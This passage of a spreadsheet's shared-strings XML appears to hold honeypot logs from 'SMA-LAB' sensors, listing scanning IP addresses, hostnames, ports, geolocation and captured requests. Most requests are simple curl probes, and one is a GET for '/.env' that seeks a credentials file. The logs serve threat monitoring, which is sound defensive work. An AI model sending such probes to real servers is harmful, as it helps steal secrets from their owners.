T_H26&amp;&amp;SMA-LAB_TELNET_H27&amp;&amp;SMA-LAB_MT-CPA_H24&amp;&amp;SMA-LAB_TELNET_H17&amp;&amp;SMA-LAB_TELNET_H5&amp;&amp;SMA-LAB_TELNET_H45&amp;&amp;SMA-LAB_TELNET_H41&amp;&amp;SMA-LAB_TELNET_H19&amp;&amp;SMA-LAB_TELNET_H30&amp;&amp;SMA-LAB_MT-CPA_H34&amp;&amp;SMA-LAB_TELNET_H35&amp;&amp;SMA-LAB_TELNET_H40&amp;&amp;SMA-LAB_TELNET_H14</t>
  </si>
  <si>
    <t>53&amp;&amp;137&amp;&amp;67&amp;&amp;80&amp;&amp;389&amp;&amp;1080&amp;&amp;22&amp;&amp;80&amp;&amp;443&amp;&amp;123&amp;&amp;19739&amp;&amp;44325&amp;&amp;54067&amp;&amp;63856&amp;&amp;54080&amp;&amp;23&amp;&amp;NA&amp;&amp;9100&amp;&amp;54269&amp;&amp;64624</t>
  </si>
  <si>
    <t>NA&amp;&amp;{Data_TELNET:NA}&amp;&amp;{Data_PJL:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '66.94.127.183:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '149.102.153.168:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}</t>
  </si>
  <si>
    <t>::ffff:3b7f:eb92</t>
  </si>
  <si>
    <t>7bc16effd93f04caa2ad310e7e649072</t>
  </si>
  <si>
    <t>114.33.25.210</t>
  </si>
  <si>
    <t>NA&amp;&amp;114-33-25-210.hinet-ip.hinet.net</t>
  </si>
  <si>
    <t>SMA-LAB_TELNET_H32&amp;&amp;SMA-LAB_TELNET_H38&amp;&amp;SMA-LAB_TELNET_H2&amp;&amp;SMA-LAB_TELNET_H44&amp;&amp;SMA-LAB_TELNET_H5&amp;&amp;SMA-LAB_TELNET_H15&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H14&amp;&amp;SMA-LAB_TELNET_H29&amp;&amp;SMA-LAB_TELNET_H45&amp;&amp;SMA-LAB_TELNET_H39&amp;&amp;SMA-LAB_TELNET_H41&amp;&amp;SMA-LAB_MT-CPA_H44&amp;&amp;SMA-LAB_TELNET_H8&amp;&amp;SMA-LAB_TELNET_H35&amp;&amp;SMA-LAB_TELNET_H12&amp;&amp;SMA-LAB_TELNET_H47&amp;&amp;SMA-LAB_TELNET_H22&amp;&amp;SMA-LAB_TELNET_H40&amp;&amp;SMA-LAB_TELNET_H27&amp;&amp;SMA-LAB_TELNET_H10&amp;&amp;SMA-LAB_TELNET_H37&amp;&amp;SMA-LAB_TELNET_H17</t>
  </si>
  <si>
    <t>23&amp;&amp;55929&amp;&amp;55947&amp;&amp;42354&amp;&amp;58348&amp;&amp;NA&amp;&amp;41973&amp;&amp;41980&amp;&amp;39630&amp;&amp;41997</t>
  </si>
  <si>
    <t>::ffff:7221:19d2</t>
  </si>
  <si>
    <t>976a13537b740a8e233c3d502d0d41f5</t>
  </si>
  <si>
    <t>123.205.67.17</t>
  </si>
  <si>
    <t>123-205-67-17.adsl.dynamic.seed.net.tw&amp;&amp;NA</t>
  </si>
  <si>
    <t>SMA-LAB_TELNET_H22&amp;&amp;SMA-LAB_TELNET_H27&amp;&amp;SMA-LAB_TELNET_H17&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H21&amp;&amp;SMA-LAB_TELNET_H5&amp;&amp;SMA-LAB_TELNET_H44&amp;&amp;SMA-LAB_TELNET_H8&amp;&amp;SMA-LAB_TELNET_H19&amp;&amp;SMA-LAB_TELNET_H7&amp;&amp;SMA-LAB_TELNET_H16&amp;&amp;SMA-LAB_TELNET_H29&amp;&amp;SMA-LAB_TELNET_H9&amp;&amp;SMA-LAB_TELNET_H12</t>
  </si>
  <si>
    <t>24.1182</t>
  </si>
  <si>
    <t>120.679</t>
  </si>
  <si>
    <t>TINP</t>
  </si>
  <si>
    <t>SEEDNET-NET</t>
  </si>
  <si>
    <t>NA&amp;&amp;{Data_TELNET:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '194.4.48.242:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '144.126.148.5:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}</t>
  </si>
  <si>
    <t>::ffff:7bcd:4311</t>
  </si>
  <si>
    <t>4e9cd1be24cb4cd4164016e142d81642</t>
  </si>
  <si>
    <t>117.5.188.255</t>
  </si>
  <si>
    <t>Thành Phố Thái Bình</t>
  </si>
  <si>
    <t>Thái Bình</t>
  </si>
  <si>
    <t>1566346</t>
  </si>
  <si>
    <t>20.45</t>
  </si>
  <si>
    <t>106.34</t>
  </si>
  <si>
    <t>::ffff:7505:bcff</t>
  </si>
  <si>
    <t>839d53c0cb33f006d6dcfae5636f7cb7</t>
  </si>
  <si>
    <t>59.184.152.139</t>
  </si>
  <si>
    <t>::ffff:3bb8:988b</t>
  </si>
  <si>
    <t>fcb0c7b53b6fadace6c2bd5c0cf9a7a8</t>
  </si>
  <si>
    <t>47.150.197.148</t>
  </si>
  <si>
    <t>Apple Valley</t>
  </si>
  <si>
    <t>5324363</t>
  </si>
  <si>
    <t>92308</t>
  </si>
  <si>
    <t>34.4993</t>
  </si>
  <si>
    <t>-117.19</t>
  </si>
  <si>
    <t>FTR3 FIOS-D Apple Valley CA</t>
  </si>
  <si>
    <t>::ffff:2f96:c594</t>
  </si>
  <si>
    <t>d14149db072baf9ae427393bcd8ab266</t>
  </si>
  <si>
    <t>152.58.96.80</t>
  </si>
  <si>
    <t>::ffff:983a:6050</t>
  </si>
  <si>
    <t>6ed30a5a8c72ab26c0112e332cd304bf</t>
  </si>
  <si>
    <t>1.171.215.176</t>
  </si>
  <si>
    <t>1-171-215-176.dynamic-ip.hinet.net&amp;&amp;NA</t>
  </si>
  <si>
    <t>SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H25</t>
  </si>
  <si>
    <t>::ffff:1ab:d7b0</t>
  </si>
  <si>
    <t>1d8b5c1b5082321d7aa64bc55a62bd80</t>
  </si>
  <si>
    <t>217.142.184.125</t>
  </si>
  <si>
    <t>['attack-source'&amp;&amp; 'attack-target:mail']&amp;&amp;Suspicious Web Activity Detected&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic</t>
  </si>
  <si>
    <t>SMA-LAB_HTTP_H10&amp;&amp;SMA-LAB_HTTPS_H15&amp;&amp;SMA-LAB_HTTP_H11&amp;&amp;SMA-LAB_HTTPS_H38&amp;&amp;SMA-LAB_HTTPS_H37&amp;&amp;SMA-LAB_HTTP_H21&amp;&amp;SMA-LAB_HTTPS_H17&amp;&amp;SMA-LAB_HTTP_H17&amp;&amp;SMA-LAB_HTTPS_H29&amp;&amp;SMA-LAB_HTTP_H14&amp;&amp;SMA-LAB_HTTP_H12&amp;&amp;SMA-LAB_HTTP_H22&amp;&amp;SMA-LAB_HTTP_H9&amp;&amp;SMA-LAB_POSTGRES_H34&amp;&amp;SMA-LAB_POSTGRES_H35&amp;&amp;SMA-LAB_POSTGRES_H46&amp;&amp;SMA-LAB_POSTGRES_H14&amp;&amp;SMA-LAB_POSTGRES_H8&amp;&amp;SMA-LAB_POSTGRES_H45&amp;&amp;SMA-LAB_POSTGRES_H28&amp;&amp;SMA-LAB_HTTP_H4&amp;&amp;SMA-LAB_HTTP_H8&amp;&amp;SMA-LAB_HTTP_H39&amp;&amp;SMA-LAB_HTTP_H5&amp;&amp;SMA-LAB_HTTP_H7&amp;&amp;SMA-LAB_HTTP_H6&amp;&amp;SMA-LAB_POSTGRES_H29&amp;&amp;SMA-LAB_HTTP_H18&amp;&amp;SMA-LAB_POSTGRES_H24&amp;&amp;SMA-LAB_POP3_H10&amp;&amp;SMA-LAB_HTTP_H16&amp;&amp;SMA-LAB_POP3_H4&amp;&amp;SMA-LAB_POP3_H37&amp;&amp;SMA-LAB_POP3_H34&amp;&amp;SMA-LAB_POP3_H41&amp;&amp;SMA-LAB_POP3_H14&amp;&amp;SMA-LAB_POP3_H21&amp;&amp;SMA-LAB_SMB_H44&amp;&amp;SMA-LAB_POP3_H29&amp;&amp;SMA-LAB_POP3_H18&amp;&amp;SMA-LAB_POP3_H15&amp;&amp;SMA-LAB_POP3_H23&amp;&amp;SMA-LAB_POP3_H17&amp;&amp;SMA-LAB_POP3_H38&amp;&amp;SMA-LAB_POP3_H22&amp;&amp;SMA-LAB_MYSQL_H16&amp;&amp;SMA-LAB_POP3_H12&amp;&amp;SMA-LAB_POP3_HC1&amp;&amp;SMA-LAB_POP3_H8</t>
  </si>
  <si>
    <t>80&amp;&amp;443&amp;&amp;5432&amp;&amp;110&amp;&amp;445&amp;&amp;3306&amp;&amp;NA</t>
  </si>
  <si>
    <t>1.32773</t>
  </si>
  <si>
    <t>103.746</t>
  </si>
  <si>
    <t>31898</t>
  </si>
  <si>
    <t>Oracle Corporation</t>
  </si>
  <si>
    <t>connection&amp;&amp;GET&amp;&amp;command&amp;&amp;login&amp;&amp;NA</t>
  </si>
  <si>
    <t>NA&amp;&amp;{Data_POP3:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Host': '154.93.37.45', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Host': '66.94.127.183', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Host': '38.54.117.64', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Host': '194.4.48.242', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Host': '38.60.224.106', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Host': '194.233.76.135', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:{'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8', 'Accept-Language': 'en-US,en;q=0.5', 'Host': '194.233.76.135', 'Upgrade-Insecure-Requests': '1', 'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:{'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8', 'Accept-Language': 'en-US,en;q=0.5', 'Host': '38.60.224.106', 'Upgrade-Insecure-Requests': '1', 'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_POP3:{'args': '/ HTTP/1.1', 'cmd': 'GET'}}&amp;&amp;{Data_POP3:{'args': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8', 'cmd': 'accept:'}}&amp;&amp;{Data_POP3:{'args': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36', 'cmd': 'user-agent:'}}&amp;&amp;{Data_POP3:{'args': 'en-US,en;q=0.5', 'cmd': 'accept-language:'}}&amp;&amp;{Data_POP3:{'args': '5.253.43.207:110', 'cmd': 'host:'}}&amp;&amp;{Data_POP3:{'args': '', 'cmd': ''}}&amp;&amp;{Data_POSTGRES:NA}&amp;&amp;{Data_MYSQL:NA}&amp;&amp;{Data_HTTP:{'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8', 'Accept-Language': 'en-US,en;q=0.5', 'Host': '194.233.76.135', 'Upgrade-Insecure-Requests': '1', 'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36', 'method': 'GET', 'uri': '/.env'}}&amp;&amp;{Data_HTTP:{'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8', 'Accept-Language': 'en-US,en;q=0.5', 'Host': '194.233.76.135', 'Upgrade-Insecure-Requests': '1', 'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Host': '109.123.229.33', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Host': '149.102.153.168', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:{'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8', 'Accept-Language': 'en-US,en;q=0.5', 'Host': '66.94.127.183', 'Upgrade-Insecure-Requests': '1', 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:{'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8', 'Accept-Language': 'en-US,en;q=0.5', 'Host': '94.131.113.33', 'Upgrade-Insecure-Requests': '1', 'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36', 'method': 'GET', 'uri': '/'}}</t>
  </si>
  <si>
    <t>::ffff:d98e:b87d</t>
  </si>
  <si>
    <t>4609cbb4d5504c656fc7b1afe0f01a39</t>
  </si>
  <si>
    <t>124.253.243.253</t>
  </si>
  <si>
    <t>Amloh</t>
  </si>
  <si>
    <t>1278758</t>
  </si>
  <si>
    <t>30.6084</t>
  </si>
  <si>
    <t>76.232</t>
  </si>
  <si>
    <t>QTLTELECOM-AS-AP</t>
  </si>
  <si>
    <t>::ffff:7cfd:f3fd</t>
  </si>
  <si>
    <t>d86acf4a9f32430825007a83c7bdca18</t>
  </si>
  <si>
    <t>182.155.97.66</t>
  </si>
  <si>
    <t>NA&amp;&amp;182-155-97-66.veetime.com</t>
  </si>
  <si>
    <t>SMA-LAB_TELNET_H37&amp;&amp;SMA-LAB_TELNET_H44&amp;&amp;SMA-LAB_TELNET_H14&amp;&amp;SMA-LAB_TELNET_H41&amp;&amp;SMA-LAB_TELNET_H45&amp;&amp;abuseipdb&amp;&amp;SMA-LAB_MT-CPA_H26&amp;&amp;SMA-LAB_TELNET_H32&amp;&amp;SMA-LAB_TELNET_H22&amp;&amp;SMA-LAB_TELNET_H15&amp;&amp;SMA-LAB_TELNET_H40&amp;&amp;SMA-LAB_TELNET_H46&amp;&amp;SMA-LAB_TELNET_H39&amp;&amp;SMA-LAB_TELNET_H38&amp;&amp;SMA-LAB_TELNET_H7&amp;&amp;SMA-LAB_TELNET_H6&amp;&amp;SMA-LAB_TELNET_H10&amp;&amp;SMA-LAB_TELNET_H13&amp;&amp;SMA-LAB_TELNET_H21&amp;&amp;SMA-LAB_TELNET_H26&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H8&amp;&amp;SMA-LAB_TELNET_H11&amp;&amp;SMA-LAB_TELNET_H20&amp;&amp;SMA-LAB_TELNET_H29&amp;&amp;SMA-LAB_TELNET_H43&amp;&amp;SMA-LAB_MT-CPA_H43</t>
  </si>
  <si>
    <t>23&amp;&amp;NA&amp;&amp;59990&amp;&amp;59970&amp;&amp;57672&amp;&amp;9950&amp;&amp;57685&amp;&amp;57664&amp;&amp;9100&amp;&amp;80</t>
  </si>
  <si>
    <t>24.1706</t>
  </si>
  <si>
    <t>120.658</t>
  </si>
  <si>
    <t>2011-01-17</t>
  </si>
  <si>
    <t>EMAX-NET</t>
  </si>
  <si>
    <t>NA&amp;&amp;{Data_TELNET:NA}&amp;&amp;{Data_PJL:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '66.94.127.183:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '94.131.113.33:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '38.60.209.6:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}</t>
  </si>
  <si>
    <t>::ffff:b69b:6142</t>
  </si>
  <si>
    <t>3ae92cce7a818a933dcfe8ac37df4ea7</t>
  </si>
  <si>
    <t>109.162.80.78</t>
  </si>
  <si>
    <t>SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_HTTP_H40&amp;&amp;SMA-LAB_VNC_H35&amp;&amp;SMA-LAB_DNS_H8&amp;&amp;SMA-LAB_SSH_H5&amp;&amp;SMA-LAB_LDAP_H12&amp;&amp;SMA-LAB_SMB_H24&amp;&amp;SMA-LAB_MT-CPA_H38&amp;&amp;SMA-LAB_TELNET_H35&amp;&amp;SMA-LAB_TELNET_H39&amp;&amp;SMA-LAB_TELNET_H45&amp;&amp;SMA-LAB_TELNET_H24&amp;&amp;SMA-LAB_TELNET_H12&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H29</t>
  </si>
  <si>
    <t>53&amp;&amp;137&amp;&amp;67&amp;&amp;80&amp;&amp;5900&amp;&amp;53&amp;&amp;22&amp;&amp;389&amp;&amp;445&amp;&amp;14914&amp;&amp;23&amp;&amp;41992</t>
  </si>
  <si>
    <t>2009-09-18</t>
  </si>
  <si>
    <t>::ffff:6da2:504e</t>
  </si>
  <si>
    <t>88a3ac10b46e797728bf64f084e6d307</t>
  </si>
  <si>
    <t>189.253.136.190</t>
  </si>
  <si>
    <t>SMA-LAB_MSSQL_H5&amp;&amp;SMA-LAB_MSSQL_HC1</t>
  </si>
  <si>
    <t>Guanajuato Municipality</t>
  </si>
  <si>
    <t>Calderones</t>
  </si>
  <si>
    <t>4016162</t>
  </si>
  <si>
    <t>20.9897</t>
  </si>
  <si>
    <t>-101.226</t>
  </si>
  <si>
    <t>{Data_MSSQl:NA}&amp;&amp;{Data_SMB:Incoming connection (189.253.136.190,63825)}</t>
  </si>
  <si>
    <t>::ffff:bdfd:88be</t>
  </si>
  <si>
    <t>3ecf016ab6273677be3fa87874d19ea6</t>
  </si>
  <si>
    <t>117.217.71.139</t>
  </si>
  <si>
    <t>::ffff:75d9:478b</t>
  </si>
  <si>
    <t>9e0aedc48397d2875410aa57cabb4642</t>
  </si>
  <si>
    <t>117.216.77.110</t>
  </si>
  <si>
    <t>::ffff:75d8:4d6e</t>
  </si>
  <si>
    <t>07f0b0408cb9b071fcf05e0196496cfd</t>
  </si>
  <si>
    <t>117.201.183.229</t>
  </si>
  <si>
    <t>::ffff:75c9:b7e5</t>
  </si>
  <si>
    <t>2eb0df019daa0364942b59589f31dcae</t>
  </si>
  <si>
    <t>117.209.93.66</t>
  </si>
  <si>
    <t>::ffff:75d1:5d42</t>
  </si>
  <si>
    <t>4c79f24a1eecddce7025f3b3e1e0324c</t>
  </si>
  <si>
    <t>118.99.80.230</t>
  </si>
  <si>
    <t>-6.28862</t>
  </si>
  <si>
    <t>106.718</t>
  </si>
  <si>
    <t>2009-10-27</t>
  </si>
  <si>
    <t>::ffff:7663:50e6</t>
  </si>
  <si>
    <t>62ab318cc233eb750a5ef946f5739266</t>
  </si>
  <si>
    <t>114.34.125.149</t>
  </si>
  <si>
    <t>114-34-125-149.hinet-ip.hinet.net&amp;&amp;NA</t>
  </si>
  <si>
    <t>::ffff:7222:7d95</t>
  </si>
  <si>
    <t>4855081b6d5fcc12d01ad5fc4f415921</t>
  </si>
  <si>
    <t>191.242.106.6</t>
  </si>
  <si>
    <t>SMA-LAB_MT-CPA_H14&amp;&amp;SMA-LAB_TELNET_HC1</t>
  </si>
  <si>
    <t>32989&amp;&amp;23&amp;&amp;NA</t>
  </si>
  <si>
    <t>3464374</t>
  </si>
  <si>
    <t>-22.7856</t>
  </si>
  <si>
    <t>-43.3117</t>
  </si>
  <si>
    <t>263476</t>
  </si>
  <si>
    <t>V W INTERNET</t>
  </si>
  <si>
    <t>::ffff:bff2:6a06</t>
  </si>
  <si>
    <t>279b7cd0c8f4b53a04992ad59e146af7</t>
  </si>
  <si>
    <t>59.126.185.178</t>
  </si>
  <si>
    <t>59-126-185-178.hinet-ip.hinet.net&amp;&amp;NA</t>
  </si>
  <si>
    <t>SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_TELNET_H3&amp;&amp;SMA-LAB_HTTP_H39&amp;&amp;SMA-LAB_DNS_H15&amp;&amp;SMA-LAB_MT-CPA_H25&amp;&amp;SMA-LAB_HTTP_H18&amp;&amp;SMA-LAB_TELNET_H8&amp;&amp;SMA-LAB_TELNET_H26&amp;&amp;SMA-LAB_TELNET_H21&amp;&amp;SMA-LAB_TELNET_H4&amp;&amp;SMA-LAB_TELNET_H47&amp;&amp;SMA-LAB_TELNET_H35&amp;&amp;SMA-LAB_TELNET_H44&amp;&amp;SMA-LAB_TELNET_H9&amp;&amp;SMA-LAB_TELNET_H39&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H45&amp;&amp;SMA-LAB_TELNET_H32&amp;&amp;SMA-LAB_TELNET_H37&amp;&amp;SMA-LAB_TELNET_H38&amp;&amp;SMA-LAB_TELNET_H15&amp;&amp;SMA-LAB_TELNET_H24&amp;&amp;SMA-LAB_TELNET_H14&amp;&amp;SMA-LAB_TELNET_H46&amp;&amp;SMA-LAB_TELNET_H29&amp;&amp;SMA-LAB_TELNET_H34&amp;&amp;SMA-LAB_TELNET_H40&amp;&amp;SMA-LAB_TELNET_H10&amp;&amp;SMA-LAB_TELNET_H23&amp;&amp;SMA-LAB_TELNET_H7&amp;&amp;SMA-LAB_TELNET_H12&amp;&amp;SMA-LAB_MT-CPA_H34&amp;&amp;SMA-LAB_TELNET_H11&amp;&amp;SMA-LAB_TELNET_H16</t>
  </si>
  <si>
    <t>53&amp;&amp;137&amp;&amp;67&amp;&amp;23&amp;&amp;80&amp;&amp;53&amp;&amp;55267&amp;&amp;57827&amp;&amp;NA&amp;&amp;9100</t>
  </si>
  <si>
    <t>::ffff:3b7e:b9b2</t>
  </si>
  <si>
    <t>9022e5626834199c5f04495fd2589081</t>
  </si>
  <si>
    <t>1.34.40.99</t>
  </si>
  <si>
    <t>1-34-40-99.hinet-ip.hinet.net&amp;&amp;NA</t>
  </si>
  <si>
    <t>SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_HTTP_H39&amp;&amp;SMA-LAB_HTTP_H12&amp;&amp;SMA-LAB_HTTP_H11&amp;&amp;SMA-LAB_DNS_H43&amp;&amp;SMA-LAB_MT-CPA_H16&amp;&amp;SMA-LAB_TELNET_H7&amp;&amp;SMA-LAB_TELNET_H47&amp;&amp;SMA-LAB_TELNET_H36&amp;&amp;SMA-LAB_TELNET_H12&amp;&amp;SMA-LAB_TELNET_H44&amp;&amp;SMA-LAB_TELNET_H15&amp;&amp;SMA-LAB_TELNET_H32&amp;&amp;SMA-LAB_TELNET_H26&amp;&amp;SMA-LAB_TELNET_H22&amp;&amp;SMA-LAB_TELNET_H34&amp;&amp;SMA-LAB_TELNET_H33&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H41&amp;&amp;SMA-LAB_TELNET_H17&amp;&amp;SMA-LAB_TELNET_H21&amp;&amp;SMA-LAB_TELNET_H24&amp;&amp;SMA-LAB_TELNET_H9&amp;&amp;SMA-LAB_TELNET_H27&amp;&amp;SMA-LAB_TELNET_H39&amp;&amp;SMA-LAB_TELNET_H38&amp;&amp;SMA-LAB_TELNET_H37&amp;&amp;SMA-LAB_TELNET_H14&amp;&amp;SMA-LAB_TELNET_H45&amp;&amp;SMA-LAB_TELNET_H29&amp;&amp;SMA-LAB_TELNET_H28</t>
  </si>
  <si>
    <t>53&amp;&amp;137&amp;&amp;67&amp;&amp;80&amp;&amp;53&amp;&amp;64781&amp;&amp;23&amp;&amp;NA</t>
  </si>
  <si>
    <t>::ffff:122:2863</t>
  </si>
  <si>
    <t>bb86bd121d02059dc8221eb50d865b17</t>
  </si>
  <si>
    <t>61.222.58.40</t>
  </si>
  <si>
    <t>61-222-58-40.hinet-ip.hinet.net&amp;&amp;NA</t>
  </si>
  <si>
    <t>SMA-LAB_TELNET_H45&amp;&amp;SMA-LAB_TELNET_H38&amp;&amp;SMA-LAB_TELNET_H41&amp;&amp;SMA-LAB_TELNET_H44&amp;&amp;SMA-LAB_TELNET_H27&amp;&amp;SMA-LAB_TELNET_H39&amp;&amp;SMA-LAB_TELNET_H24&amp;&amp;SMA-LAB_TELNET_H35&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H21&amp;&amp;SMA-LAB_TELNET_H7&amp;&amp;SMA-LAB_TELNET_H40&amp;&amp;SMA-LAB_MT-CPA_H38&amp;&amp;SMA-LAB_TELNET_H8&amp;&amp;SMA-LAB_TELNET_H36&amp;&amp;SMA-LAB_TELNET_H34&amp;&amp;SMA-LAB_TELNET_H12&amp;&amp;SMA-LAB_TELNET_H22&amp;&amp;SMA-LAB_TELNET_H47&amp;&amp;SMA-LAB_TELNET_H11&amp;&amp;SMA-LAB_TELNET_H25&amp;&amp;SMA-LAB_TELNET_H37&amp;&amp;SMA-LAB_TELNET_H10&amp;&amp;SMA-LAB_HTTP_H12&amp;&amp;SMA-LAB_HTTP_H22&amp;&amp;SMA-LAB_HTTP_H14&amp;&amp;SMA-LAB_HTTP_H39&amp;&amp;SMA-LAB_HTTP_H5&amp;&amp;SMA-LAB_HTTP_H4</t>
  </si>
  <si>
    <t>23&amp;&amp;56586&amp;&amp;80&amp;&amp;NA</t>
  </si>
  <si>
    <t>NA&amp;&amp;{Data_HTTP:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '38.60.209.6:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '109.123.229.33:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_TELNET:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '38.54.117.64:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '94.131.113.33:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '193.57.136.113:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '38.60.224.106:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '194.233.76.135:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '154.93.37.45:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '103.113.68.70:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}</t>
  </si>
  <si>
    <t>::ffff:3dde:3a28</t>
  </si>
  <si>
    <t>f3d342cb4597932d7b6124e14265b6ea</t>
  </si>
  <si>
    <t>125.229.90.38</t>
  </si>
  <si>
    <t>125-229-90-38.hinet-ip.hinet.net&amp;&amp;NA</t>
  </si>
  <si>
